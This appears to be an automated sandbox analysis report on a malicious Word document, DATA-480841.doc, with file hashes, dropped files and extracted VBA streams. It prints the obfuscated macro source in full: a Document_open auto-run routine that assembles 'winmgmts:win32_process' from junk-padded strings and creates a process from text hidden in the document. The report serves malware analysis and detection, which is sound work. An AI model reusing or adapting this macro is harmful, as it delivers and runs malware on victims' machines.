                                            SHA-512:A19B46013D6958EE4B24D1B5C37466A0EBE85B0187003970900753A42076124A38B4DDC880560DBEB9E80976887A4AFCD9E0A889E504575BBB5E223C688F3858
                                            Malicious:false
                                            Preview: [doc]..DATA-480841.LNK=0..DATA-480841.LNK=0..[doc]..DATA-480841.LNK=0..
                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):162
                                            Entropy (8bit):2.431160061181642
                                            Encrypted:false
                                            SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                            MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                            SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                            SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                            SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                            Malicious:false
                                            Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IA60F366WYHGBU3KMBI7.temp
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):8016
                                            Entropy (8bit):3.5864454036976654
                                            Encrypted:false
                                            SSDEEP:96:chQCsMqbqvsqvJCwoSz8hQCsMqbqvsEHyqvJCwor8zv1YkHVf8OzlUVIIu:cy+oSz8yWHnor8zvpf8OjIu
                                            MD5:381B309891E02EEBC8A0AD30FA4A8C2E
                                            SHA1:1D4C2C8EFB538F3FDC7696EE142B50199A1A6B45
                                            SHA-256:BBFB5B76E4CC383551743BC5C9F1DCE3EF0978D7CF3033932C5E2CE7EAB97BDF
                                            SHA-512:CD7A09AFC5713E01CAC59A5E5E52B7B42E8EBC23818C6D97363DB2FDC73C06B3889080BE8D67D15B228D77FBADA9B82B4078F200707A4E079B983AB432821F0E
                                            Malicious:false
                                            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                            C:\Users\user\Desktop\~$TA-480841.doc
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):162
                                            Entropy (8bit):2.431160061181642
                                            Encrypted:false
                                            SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                            MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                            SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                            SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                            SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                            Malicious:false
                                            Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                            C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):200625
                                            Entropy (8bit):7.475413668537472
                                            Encrypted:false
                                            SSDEEP:3072:CtEwbpDnn9FfrNyVBYF0n3ajFq4weCp2S2MJdhzybMO8dSySA:CtEsl9FTaBYF0nVp2MJHybR8dS9
                                            MD5:D3EF5D9C09B25890DACFCE5D440EA042
                                            SHA1:F88C6C45E5E5A8A3573D20EDF7C474B29778002A
                                            SHA-256:52CDD409E97D303319405D775622CC2BF34BBF76E0EF3C018F6D13EA395D7766
                                            SHA-512:FAC932431D0A1457377DE14A713E6DEF91382A6764355D6575763941BF75E23267AF5BECDEBE85726842A83B5B1D601C39627C8661A79AF45689A861E33332D2
                                            Malicious:false
                                            Preview: <!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site | Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>...

                                            Static File Info

                                            General

                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: lime payment B2B responsive Practical solid state copy compelling, Author: Clment Fontaine, Template: Normal.dotm, Last Saved By: La Menard, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 5 10:15:00 2021, Last Saved Time/Date: Tue Jan 5 10:15:00 2021, Number of Pages: 1, Number of Words: 2640, Number of Characters: 15049, Security: 8
                                            Entropy (8bit):6.709357793973764
                                            TrID:
                                            • Microsoft Word document (32009/1) 79.99%
                                            • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                            File name:DATA-480841.doc
                                            File size:169330
                                            MD5:2ed8a95357ee4e2d433bcbeb2ef43fc9
                                            SHA1:06838eec498718aace03e6ef28d3f0292a631f8a
                                            SHA256:485c5e8d7bc0f0fc416a7d6cfa8780ebc42c03ff41568af70c358ee8b8afa02c
                                            SHA512:4a02c2878c9787ed268744ecbce51cbf082e5f4d9403867e63ccba10c04c91558d25a22608fad763748d356c29fbe1b3ef3ea28ae38ab534def6380cd5434b9b
                                            SSDEEP:3072:4D9ufstRUUKSns8T00JSHUgteMJ8qMD7gs:4D9ufsfgIf0pLs
                                            File Content Preview:........................>......................................................................................................................................................................................................................................

                                            File Icon

                                            Icon Hash:e4eea2aaa4b4b4a4

                                            Static OLE Info

                                            General

                                            Document Type:OLE
                                            Number of OLE Files:1

                                            OLE File "DATA-480841.doc"

                                            Indicators

                                            Has Summary Info:True
                                            Application Name:Microsoft Office Word
                                            Encrypted Document:False
                                            Contains Word Document Stream:True
                                            Contains Workbook/Book Stream:False
                                            Contains PowerPoint Document Stream:False
                                            Contains Visio Document Stream:False
                                            Contains ObjectPool Stream:
                                            Flash Objects Count:
                                            Contains VBA Macros:True

                                            Summary

                                            Code Page:1252
                                            Title:
                                            Subject:lime payment B2B responsive Practical solid state copy compelling
                                            Author:Clment Fontaine
                                            Keywords:
                                            Comments:
                                            Template:Normal.dotm
                                            Last Saved By:La Menard
                                            Revion Number:1
                                            Total Edit Time:0
                                            Create Time:2021-01-05 10:15:00
                                            Last Saved Time:2021-01-05 10:15:00
                                            Number of Pages:1
                                            Number of Words:2640
                                            Number of Characters:15049
                                            Creating Application:Microsoft Office Word
                                            Security:8

                                            Document Summary

                                            Document Code Page:-535
                                            Number of Lines:125
                                            Number of Paragraphs:35
                                            Thumbnail Scaling Desired:False
                                            Company:
                                            Contains Dirty Links:False
                                            Shared Document:False
                                            Changed Hyperlinks:False
                                            Application Version:917504

                                            Streams with VBA

                                            VBA File Name: A5gd21klfqu9c6rs, Stream Size: 1117
                                            General
                                            Stream Path:Macros/VBA/A5gd21klfqu9c6rs
                                            VBA File Name:A5gd21klfqu9c6rs
                                            Stream Size:1117
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 49 85 f4 e6 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            Private
                                            VB_Exposed
                                            Attribute
                                            VB_Creatable
                                            VB_Name
                                            Document_open()
                                            VB_Customizable
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_TemplateDerived
                                            VBA Code
                                            Attribute VB_Name = "A5gd21klfqu9c6rs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
G8xesq0b8jlsfrsp
End Sub
                                            VBA File Name: Owppnp8hah4xo788, Stream Size: 17915
                                            General
                                            Stream Path:Macros/VBA/Owppnp8hah4xo788
                                            VBA File Name:Owppnp8hah4xo788
                                            Stream Size:17915
                                            Data ASCII:. . . . . . . . . | . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . I . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 7c 06 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 83 06 00 00 a3 30 00 00 00 00 00 00 01 00 00 00 49 85 65 07 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            DpYbmDA
                                            oAaNlB
                                            vrYYHIDxI
                                            WTbkNqFa
                                            Object
                                            RjiQHRA
                                            "bBmgOCvPPojGGC"
                                            MNihxICY
                                            DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")
                                            GfRPP
                                            tWcKo
                                            OMZxxg
                                            "lwWhZGEasjsS"
                                            "deVdMyoREdgzCaJb"
                                            fDZVKAAc:
                                            uWZkeMFv.WriteLine
                                            xLQtMd
                                            nleaHR
                                            gEcrV:
                                            "OyFBLhlWUnD"
                                            uWZkeMFv.Close
                                            xsruLB
                                            zDsRaIBGF
                                            mgrwfmN
                                            "XZzpBRpDKuMgsGHIHF"
                                            "VrVKCjefsIJ"
                                            pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
                                            SblcDCC:
                                            SQQWY
                                            "hbtzFRJEXyDCXI"
                                            iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")
                                            sCOIGDtD:
                                            gxBPJB
                                            jbUmDI
                                            DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")
                                            "BnxHFzJCGhVHrFIm"
                                            IcAHwPH
                                            iFTmFHFH
                                            STzBjwICv
                                            kwzjKvZHe
                                            fDZVKAAc.WriteLine
                                            plqkuDI
                                            RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")
                                            ZMdrVHGz:
                                            SeHafBC
                                            nhLeJMLfI
                                            EISYDDB
                                            EhCMG
                                            UDSpFHqFJ
                                            WlBWDXGD
                                            "NisSEYrcDlKQUITa"
                                            "dXFPCSYtSNB"
                                            "NeiIGCNWgICn"
                                            OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")
                                            mgrwfmN.Close
                                            YVZXECEHD
                                            FLtYjKHC
                                            GfRPP.Close
                                            idbaDIr
                                            "dnUnKFHAkIOdD"
                                            "nJJzFRjEWpRikxCD"
                                            ANzGyzCD
                                            MmSDYCkJR
                                            "hKlajOujwgDFAA"
                                            "eeVVJBMGlcfXMB"
                                            RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
                                            iHKuDmaEr:
                                            "CcDmClHsnCC"
                                            "UjBKOEDRIbiWFB"
                                            QOrvJEB
                                            "sxbwAfRtWJI"
                                            UskmBJF
                                            "KqVyuQQfwTWh"
                                            tpOgXmm
                                            fiyQuiRBI
                                            gphNDVZp
                                            vEBqHrDnD
                                            PbhYVsA.Close
                                            ZMdrVHGz.Close
                                            "vVbvIHcFGEAJJ"
                                            CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
                                            KmGOADt
                                            Resume
                                            phIwFD
                                            jPJENIo
                                            AiRdGDAJ
                                            KmGOADt.Close
                                            "]an"
                                            PnolTIbAB
                                            "eEWdaDQVJJqTHgF"
                                            gxBPJB:
                                            eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
                                            FYVZFEH
                                            tzErBRFe
                                            "LvnHAGHfIhRDBRAF"
                                            NuebA:
                                            sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
                                            oQgLUI
                                            SblcDCC.Close
                                            HCvCmAcHC
                                            "eXpjHFapHaPdRJu"
                                            eepvDEaE
                                            "DBvMcNtCcMyJDDI"
                                            MHYlQAD
                                            "ekluIEBJFIgoBcGC"
                                            dXiwA
                                            "MiCjaGqJfPrI"
                                            eCIzUDyJ
                                            RyDBDK
                                            hFSyAfFrF
                                            "fDdPHEjBEnAdZqZFJ"
                                            zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
                                            "MxCpGaGqBgemCAFEJ"
                                            PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
                                            sCOIGDtD.Close
                                            uWZkeMFv
                                            gzTFLxb
                                            IePCGy
                                            swNGWdd
                                            qHKYGHlFA
                                            OIbfvEEFF
                                            CHVmaVC
                                            ZMdrVHGz
                                            TXmxvp
                                            quDoH
                                            iHKuDmaEr.WriteLine
                                            KXTliE
                                            ddanFDWJf
                                            rJEkbLH
                                            fNhiCVgGS:
                                            noebIvSiu
                                            YZllAeRe
                                            VB_Name
                                            "eXObOTlBAITEOIo"
                                            mgrwfmN:
                                            LzxxRHG
                                            inIcjJtaF
                                            EKmLA
                                            uVItICICB
                                            mgrwfmN.WriteLine
                                            KXwaABT
                                            fDZVKAAc.Close
                                            Mid(Application.Name,
                                            fmwdEMADQ
                                            lBenBDA
                                            SblcDCC
                                            mgTNFCq
                                            NuebA.WriteLine
                                            hXxQDACJA
                                            KmGOADt.WriteLine
                                            HCvCmAcHC.Close
                                            yJmmmVIAG
                                            rYbgBh:
                                            iHKuDmaEr.Close
                                            NuebA.Close
                                            hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
                                            ZMdrVHGz.WriteLine
                                            OlapGi
                                            zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
                                            "CVbRCAAhkhmcDG"
                                            HCvCmAcHC:
                                            BNmrm
                                            rYbgBh
                                            "WNFUDvHgghFdup"
                                            uRnkDGJ
                                            "qiXBsMBsLJGbX"
                                            yabVbA
                                            zBSWCKmJv
                                            bbsIZ
                                            "zdTcdOoXXUFHJK"
                                            xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
                                            RqlOZAHRJ
                                            fNhiCVgGS.WriteLine
                                            hjZwD
                                            "EgxfIDVQbJotWhj"
                                            "BUUJYAAIoJvLBLAo"
                                            PcHRGIADo
                                            wTMSLyWFG
                                            sCOIGDtD
                                            PbhYVsA:
                                            "BndJDkuVYF"
                                            KmGOADt:
                                            "RhnJRGeBNASBQHHGF"
                                            anyPG
                                            "JTSPCDjykfL"
                                            sreXHFD
                                            "XrrAwQZPjqB"
                                            hoyzuBGCP
                                            UavHTIBHo
                                            qAUhkIMz
                                            EKezHIC
                                            PjNhJNA
                                            GznGGHyG
                                            UwyYSBsBN
                                            ORLICIl
                                            cwsTFPCH
                                            "]anw["
                                            drZcHkCm
                                            hDJDJ
                                            NXbmIuHX
                                            Function
                                            "syYTHJShrguhzb"
                                            AioOpBFE
                                            xiFRA
                                            fmwdEMADQ.WriteLine
                                            gxBPJB.Close
                                            NZiApKAp
                                            gEcrV.Close
                                            "mehEFPFHcklgJDDx"
                                            iHKuDmaEr
                                            pULquU
                                            SblcDCC.WriteLine
                                            pkixJADG:
                                            xkQqDXCcD
                                            GIAKA
                                            "TubioGUTLadgXbA"
                                            "anBQXljzGenE"
                                            xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
                                            fDZVKAAc
                                            ecGmY
                                            "ptABFEZDmkMVIeD"
                                            "TBKmUCEXTUIGu"
                                            "fxSJajCGlWUEBW"
                                            rYbgBh.WriteLine
                                            DhnHIY
                                            sCOIGDtD.WriteLine
                                            tAmQHxlD
                                            tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
                                            "wypNISsWSXthFJCq"
                                            eLmLDU
                                            jENfzNH
                                            gEcrV.WriteLine
                                            Nothing
                                            "uTtCAFwHpCGF"
                                            PbhYVsA
                                            gEcrV
                                            NuebA
                                            "aqGiHISIbAoabV"
                                            fNhiCVgGS.Close
                                            jsYAGBJAF
                                            RhztCF
                                            lADFBaJ
                                            FUyIHBDFz
                                            sPkIwu
                                            ViWsSIH
                                            gxBPJB.WriteLine
                                            zZuzBZGD
                                            pkixJADG.WriteLine
                                            MznOjBB
                                            fmwdEMADQ.Close
                                            sTzDC
                                            "oLweAMoGsqVE"
                                            diCXTi
                                            GfRPP.WriteLine
                                            Error
                                            uWZkeMFv:
                                            xPBGH
                                            Attribute
                                            sySRJ
                                            "WLXLJnjItPGPZJ"
                                            "JMgUDAIEJlgyNBH"
                                            jzqBlGW
                                            CFdSBD
                                            pkixJADG.Close
                                            ibIiBF
                                            "qDaYIDDSZQMTaO"
                                            pkixJADG
                                            GfRPP:
                                            LQqlBAHD
                                            dLRiF
                                            "ImJJdfAtdFHCh"
                                            PbhYVsA.WriteLine
                                            DkLoDL
                                            RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
                                            fNhiCVgGS
                                            fmwdEMADQ:
                                            rYbgBh.Close
                                            zxgLHJSFW
                                            HCvCmAcHC.WriteLine
                                            hZCth
                                            VBA Code
                                            Attribute VB_Name = "Owppnp8hah4xo788"
Function G8xesq0b8jlsfrsp()
On Error Resume Next
Dhubl2is48jort = "Jsnt2t9fi0a8nnsiaf" + "Bete9x47doew46v"
sf4 = Zw1k7hcmdl66 + A5gd21klfqu9c6rs.StoryRanges.Item(2 / 2) + Hyii7r76oq89
   GoTo SblcDCC
Dim pULquU As Object
Set ibIiBF = diCXTi
Set pULquU = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim SblcDCC As Object
Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
SblcDCC.WriteLine "VrVKCjefsIJ"
SblcDCC.WriteLine "sxbwAfRtWJI"
SblcDCC.WriteLine "WLXLJnjItPGPZJ"
Set jbUmDI = NZiApKAp
SblcDCC.Close
Set pULquU = Nothing
Set MznOjBB = vrYYHIDxI
Set SblcDCC = Nothing
SblcDCC:
t3s = "]anw[3" + "p]anw[3"
K50yjh8o6l7s = "]an" + "w[3ro]anw[3]a" + "nw[3ce]anw[3s]anw[3s]anw[3]anw[3"
   GoTo fNhiCVgGS
Dim RyDBDK As Object
Set WTbkNqFa = gzTFLxb
Set RyDBDK = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim fNhiCVgGS As Object
Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")
fNhiCVgGS.WriteLine "ImJJdfAtdFHCh"
fNhiCVgGS.WriteLine "deVdMyoREdgzCaJb"
fNhiCVgGS.WriteLine "XZzpBRpDKuMgsGHIHF"
Set OlapGi = PjNhJNA
fNhiCVgGS.Close
Set RyDBDK = Nothing
Set yabVbA = oAaNlB
Set fNhiCVgGS = Nothing
fNhiCVgGS:
Brlo236t2rmfu = "]anw[3:w]anw[3]anw[3i" + "n]anw[33]anw[32]anw[3_]anw[3"
   GoTo HCvCmAcHC
Dim iFTmFHFH As Object
Set UDSpFHqFJ = sySRJ
Set iFTmFHFH = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim HCvCmAcHC As Object
Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")
HCvCmAcHC.WriteLine "uTtCAFwHpCGF"
HCvCmAcHC.WriteLine "lwWhZGEasjsS"
HCvCmAcHC.WriteLine "MiCjaGqJfPrI"
Set MmSDYCkJR = UwyYSBsBN
HCvCmAcHC.Close
Set iFTmFHFH = Nothing
Set EISYDDB = tpOgXmm
Set HCvCmAcHC = Nothing
HCvCmAcHC:
Iogna_9cq5gv = "w]anw[3in]anw[3m]an" + "w[3gm]anw[3t]anw[3]anw[3"
   GoTo gEcrV
Dim RqlOZAHRJ As Object
Set jsYAGBJAF = MHYlQAD
Set RqlOZAHRJ = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim gEcrV As Object
Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
gEcrV.WriteLine "dXFPCSYtSNB"
gEcrV.WriteLine "KqVyuQQfwTWh"
gEcrV.WriteLine "qDaYIDDSZQMTaO"
Set IePCGy = GznGGHyG
gEcrV.Close
Set RqlOZAHRJ = Nothing
Set cwsTFPCH = bbsIZ
Set gEcrV = Nothing
gEcrV:
Fo4b_d8mj9usjgaha = "]anw[3" + "]anw[3" + Mid(Application.Name, 4 + 2, 2 - 1) + "]anw[" + "3]anw[3"
   GoTo ZMdrVHGz
Dim xsruLB As Object
Set fiyQuiRBI = swNGWdd
Set xsruLB = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim ZMdrVHGz As Object
Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
ZMdrVHGz.WriteLine "MxCpGaGqBgemCAFEJ"
ZMdrVHGz.WriteLine "hbtzFRJEXyDCXI"
ZMdrVHGz.WriteLine "zdTcdOoXXUFHJK"
Set xPBGH = rJEkbLH
ZMdrVHGz.Close
Set xsruLB = Nothing
Set dLRiF = vEBqHrDnD
Set ZMdrVHGz = Nothing
ZMdrVHGz:
K427k3xfk130n18n = Iogna_9cq5gv + Fo4b_d8mj9usjgaha + Brlo236t2rmfu + t3s + K50yjh8o6l7s
   GoTo fDZVKAAc
Dim tzErBRFe As Object
Set SeHafBC = tWcKo
Set tzErBRFe = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim fDZVKAAc As Object
Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
fDZVKAAc.WriteLine "hKlajOujwgDFAA"
fDZVKAAc.WriteLine "JMgUDAIEJlgyNBH"
fDZVKAAc.WriteLine "BUUJYAAIoJvLBLAo"
Set CHVmaVC = LzxxRHG
fDZVKAAc.Close
Set tzErBRFe = Nothing
Set WlBWDXGD = EKezHIC
Set fDZVKAAc = Nothing
fDZVKAAc:
Lutf6_3d403q9 = Jlda77h_v8nx5(K427k3xfk130n18n)
   GoTo rYbgBh
Dim hZCth As Object
Set LQqlBAHD = DpYbmDA
Set hZCth = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim rYbgBh As Object
Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
rYbgBh.WriteLine "CVbRCAAhkhmcDG"
rYbgBh.WriteLine "XrrAwQZPjqB"
rYbgBh.WriteLine "fxSJajCGlWUEBW"
Set phIwFD = hDJDJ
rYbgBh.Close
Set hZCth = Nothing
Set PnolTIbAB = dXiwA
Set rYbgBh = Nothing
rYbgBh:
Set Mwzin4vxc1irit = CreateObject(Lutf6_3d403q9)
   GoTo GfRPP
Dim xLQtMd As Object
Set uRnkDGJ = hFSyAfFrF
Set xLQtMd = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim GfRPP As Object
Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
GfRPP.WriteLine "qiXBsMBsLJGbX"
GfRPP.WriteLine "mehEFPFHcklgJDDx"
GfRPP.WriteLine "BndJDkuVYF"
Set xiFRA = hXxQDACJA
GfRPP.Close
Set xLQtMd = Nothing
Set jENfzNH = xkQqDXCcD
Set GfRPP = Nothing
GfRPP:
Jaaqx1xn5daotw = Mid(sf4, (1 + 4), Len(sf4))
   GoTo sCOIGDtD
Dim eepvDEaE As Object
Set jzqBlGW = lBenBDA
Set eepvDEaE = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim sCOIGDtD As Object
Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
sCOIGDtD.WriteLine "JTSPCDjykfL"
sCOIGDtD.WriteLine "bBmgOCvPPojGGC"
sCOIGDtD.WriteLine "anBQXljzGenE"
Set tAmQHxlD = UavHTIBHo
sCOIGDtD.Close
Set eepvDEaE = Nothing
Set gphNDVZp = IcAHwPH
Set sCOIGDtD = Nothing
sCOIGDtD:
   GoTo fmwdEMADQ
Dim DkLoDL As Object
Set plqkuDI = BNmrm
Set DkLoDL = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim fmwdEMADQ As Object
Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")
fmwdEMADQ.WriteLine "dnUnKFHAkIOdD"
fmwdEMADQ.WriteLine "ekluIEBJFIgoBcGC"
fmwdEMADQ.WriteLine "BnxHFzJCGhVHrFIm"
Set jPJENIo = FLtYjKHC
fmwdEMADQ.Close
Set DkLoDL = Nothing
Set ANzGyzCD = qAUhkIMz
Set fmwdEMADQ = Nothing
fmwdEMADQ:
Mwzin4vxc1irit.Create Jlda77h_v8nx5(Jaaqx1xn5daotw), V2enhc4htwl7z6bh, Thriap3q9rgf3yy9y
   GoTo pkixJADG
Dim DhnHIY As Object
Set oQgLUI = zZuzBZGD
